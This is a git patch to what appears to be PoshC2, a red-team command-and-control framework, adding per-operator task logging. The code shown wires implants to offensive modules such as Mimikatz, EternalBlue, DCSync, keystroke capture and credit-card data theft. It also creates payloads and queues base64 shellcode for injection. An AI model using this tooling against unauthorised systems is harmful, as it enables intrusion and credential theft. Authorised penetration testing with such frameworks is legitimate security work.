From 72172ba83ce397a575fd8810878e2a47e052e235 Mon Sep 17 00:00:00 2001 From: m0rv4i Date: Mon, 11 Feb 2019 17:05:14 +0000 Subject: [PATCH] Add config option LogUsers, false by default but it set to true will prompt for a username (or can pass one to ImplantHandler with -u or --u ). Tasks run by that user will then be logged as that user. --- AutoLoads.py | 212 ++++++++++++++--------------- Config.py | 1 + DB.py | 11 +- Implant.py | 5 +- ImplantHandler.py | 329 ++++++++++++++++++++++++---------------------- Tasks.py | 5 +- 6 files changed, 287 insertions(+), 276 deletions(-) diff --git a/AutoLoads.py b/AutoLoads.py index 177820e..59c71f1 100644 --- a/AutoLoads.py +++ b/AutoLoads.py @@ -4,7 +4,7 @@ from DB import * from Config import * import os, base64 -def check_module_loaded( module_name, randomuri, force=False ): +def check_module_loaded( module_name, randomuri, user, force=False ): try: modules_loaded = select_mods(randomuri) if force: @@ -13,7 +13,7 @@ def check_module_loaded( module_name, randomuri, force=False ): module_name = modname file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) if modules_loaded: new_modules_loaded = "%s %s" % (modules_loaded, module_name) if module_name in modules_loaded: @@ -24,117 +24,117 @@ def check_module_loaded( module_name, randomuri, force=False ): module_name = modname file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) update_mods(new_modules_loaded, randomuri) else: new_modules_loaded = "%s" % (module_name) file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) update_mods(new_modules_loaded, randomuri) except Exception as e: print ("Error loadmodule: %s" % e) -def run_autoloads(command, randomuri): - if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri) - if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri) - if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri) - if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri) - if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri) - if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri) - if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri) - if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri) - if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri) - if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri) - if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri) - if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri) - if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri) - if "get-gppautologon" in command.lower(): check_module_loaded("Get-GPPAutologon.ps1", randomuri) - if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri) - if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri) - if "get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri) - if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri) - if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri) - if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri) - if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri) - if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri) - if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri) - if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri) - if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri) - if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri) - if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri) - if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri) - if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri) - if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri) - if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri) - if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", randomuri) - if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri) - if "invoke-arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri) - if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri) - if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri) - if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri) - if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri) - if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri) - if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri) - if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri) - if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri) - if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri) - if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri) - if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri) - if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri) - if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri) - if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri) - if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri) - if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri) - if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri) - if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri) - if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri) - if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri) - if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri) - if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri) - if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri) - if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri) - if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri) - if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri) - if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri) - if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri) - if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri) - if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri) - if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri) - if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri) - if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri) - if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri) - if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri) - if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri) - if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri) +def run_autoloads(command, randomuri, user): + if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user) + if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri, user) + if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri, user) + if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri, user) + if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri, user) + if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri, user) + if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri, user) + if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri, user) + if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user) + if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user) + if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri, user) + if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri, user) + if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri, user) + if "get-gppautologon" in command.lower(): check_module_loaded("Get-GPPAutologon.ps1", randomuri, user) + if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri, user) + if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri, user) + if "get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri, user) + if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri, user) + if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri, user) + if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri, user) + if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri, user) + if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri, user) + if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri, user) + if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri, user) + if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri, user) + if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri, user) + if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri, user) + if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri, user) + if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri, user) + if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri, user) + if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri, user) + if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", randomuri, user) + if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri, user) + if "invoke-arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user) + if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user) + if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri, user) + if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user) + if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri, user) + if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user) + if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri, user) + if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) + if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri, user) + if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri, user) + if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri, user) + if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri, user) + if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user) + if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user) + if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri, user) + if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri, user) + if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri, user) + if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user) + if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri, user) + if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri, user) + if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user) + if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user) + if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri, user) + if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user) + if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user) + if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri, user) + if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri, user) + if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri, user) + if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri, user) + if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user) + if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri, user) + if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri, user) + if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri, user) + if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri, user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user) + if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user) + if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) + if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user) diff --git a/Config.py b/Config.py index dd7e28f..a93d745 100644 --- a/Config.py +++ b/Config.py @@ -17,6 +17,7 @@ QuickCommand = urlConfig.fetchQCUrl() DownloadURI = urlConfig.fetchConnUrl() Sounds = "No" ServerPort = "443" +LogUsers = True EnableNotifications = "No" # ClockworkSMS - https://www.clockworksms.com diff --git a/DB.py b/DB.py index 283a0e9..40b15c1 100644 --- a/DB.py +++ b/DB.py @@ -42,7 +42,8 @@ def initializedb(): create_newtasks = """CREATE TABLE NewTasks ( TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, - Command TEXT);""" + Command TEXT, + User TEXT);""" create_urls = """CREATE TABLE URLs ( URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, @@ -137,7 +138,7 @@ def get_implants_all(): else: return None -def get_nettasks_all(): +def get_newtasks_all(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() @@ -155,18 +156,18 @@ def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPas c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry)) conn.commit() -def drop_nettasks(): +def drop_newtasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() c.execute("DELETE FROM NewTasks ") conn.commit() -def new_task( task, randomuri ): +def new_task( task, user, randomuri ): conn = sqlite3.connect(DB) conn.text_factory = str c = conn.cursor() - c.execute("INSERT INTO NewTasks (RandomURI, Command) VALUES (?, ?)",(randomuri, task)) + c.execute("INSERT INTO NewTasks (RandomURI, Command, User) VALUES (?, ?, ?)",(randomuri, task, user)) conn.commit() def get_lastcommand(): diff --git a/Implant.py b/Implant.py index 461dde5..100950f 100644 --- a/Implant.py +++ b/Implant.py @@ -101,10 +101,9 @@ IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDa new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label) def autoruns(self): - new_task("loadmodule Core.ps1", self.RandomURI) + new_task("loadmodule Core.ps1", "autoruns", self.RandomURI) update_mods("Core.ps1", self.RandomURI) result = get_autoruns() if result: - autoruns = "" for autorun in result: - new_task(autorun[1], self.RandomURI) + new_task(autorun[1], "autoruns", self.RandomURI) diff --git a/ImplantHandler.py b/ImplantHandler.py index 7007602..8b77afe 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -1,6 +1,6 @@ #!/usr/bin/python -import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess +import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse import datetime from datetime import datetime, timedelta from sqlite3 import Error @@ -37,7 +37,7 @@ def createproxypayload(): newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire ) - startup("Created new proxy payloads") + startup(user, "Created new proxy payloads") def createdaisypayload(): name = raw_input("Daisy name: e.g. DC1 ") @@ -58,7 +58,7 @@ def createdaisypayload(): newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" ) - startup("Created new %s daisy payloads" % name) + startup(user, "Created new %s daisy payloads" % name) def createnewpayload(): domain = raw_input("Domain or URL: https://www.example.com ") @@ -90,7 +90,7 @@ def createnewpayload(): newPayload.CreateMsbuild("%s_" % domainbase) newPayload.CreatePython("%s_" % domainbase) new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire ) - startup("Created new payloads") + startup(user, "Created new payloads") def argp(cmd): args = "" @@ -156,11 +156,12 @@ def migrate(randomuri, params=""): elif implant_comms == "Proxy": shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch)) - check_module_loaded("Inject-Shellcode.ps1", randomuri) - new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) - new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user) + new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) + new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) + +def startup(user, printhelp = ""): -def startup(printhelp = ""): try: if os.name == 'nt': os.system('cls') @@ -174,6 +175,10 @@ def startup(printhelp = ""): print (Colours.END + "") try: + if user is not None: + print (Colours.GREEN) + print ("User: %s" % user) + print (Colours.END) ii = get_implants() if ii: for i in ii: @@ -247,7 +252,7 @@ def startup(printhelp = ""): ExError = e if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"): - startup() + startup(user) if "output-to-html" in implant_id.lower(): generate_table("Tasks") @@ -256,55 +261,55 @@ def startup(printhelp = ""): generate_table("Implants") graphviz() time.sleep(1) - startup() + startup(user) if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()): urls = get_c2urls() urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" for i in urls: urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]) - startup(urlformatted) + startup(user, urlformatted) if "add-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("add-autorun ","") autorun = autorun.replace("add-autorun","") add_autorun(autorun) - startup("add-autorun: %s\r\n" % autorun) + startup(user, "add-autorun: %s\r\n" % autorun) if "list-autorun" in implant_id.lower(): autoruns = get_autorun() - startup(autoruns) + startup(user, autoruns) if "del-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("del-autorun ","") del_autorun(autorun) - startup("deleted autorun\r\n") + startup(user, "deleted autorun\r\n") if "nuke-autorun" in implant_id.lower(): del_autoruns() - startup("nuked autoruns\r\n") + startup(user, "nuked autoruns\r\n") if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"): - startup("automigrate not currently implemented for the Python version of PoshC2\r\n") + startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n") if "show-serverinfo" in implant_id.lower(): i = get_c2server_all() detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24]) - startup(detailsformatted) + startup(user, detailsformatted) if "turnoff-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "No") - startup("Turned off notifications on new implant") + startup(user, "Turned off notifications on new implant") if "turnon-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "Yes") - startup("Turned on notifications on new implant") + startup(user, "Turned on notifications on new implant") if "set-clockworksmsapikey" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","") cmd = cmd.replace("set-clockworksmsapikey","") update_item("MobileNumber", "C2Server", cmd) - startup("Updated set-clockworksmsapikey: %s\r\n" % cmd) + startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd) if "set-clockworksmsnumber" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","") cmd = cmd.replace("set-clockworksmsnumber","") update_item("APIKEY", "C2Server", cmd) - startup("Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) + startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) if "set-defaultbeacon" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-defaultbeacon ","") cmd = cmd.replace("set-defaultbeacon","") update_item("DefaultSleep", "C2Server", cmd) - startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) + startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() comtasks = get_tasks() @@ -332,38 +337,38 @@ def startup(printhelp = ""): line = line.replace('\r','') filenameuploaded = line.rstrip().split(":",1)[1] uploads += "%s %s \n" % (hostname[3], filenameuploaded) - startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads)) + startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads)) if "listmodules" in implant_id.lower(): mods = "" for modname in os.listdir("%s/Modules/" % POSHDIR): mods += "%s\r\n" % modname - startup(mods) + startup(user, mods) if "creds" in implant_id.lower(): - startup("creds module not implemented yet") + startup(user, "creds module not implemented yet") if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"): subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")]) - startup() + startup(user) if (implant_id.lower() == "tasks" ) or 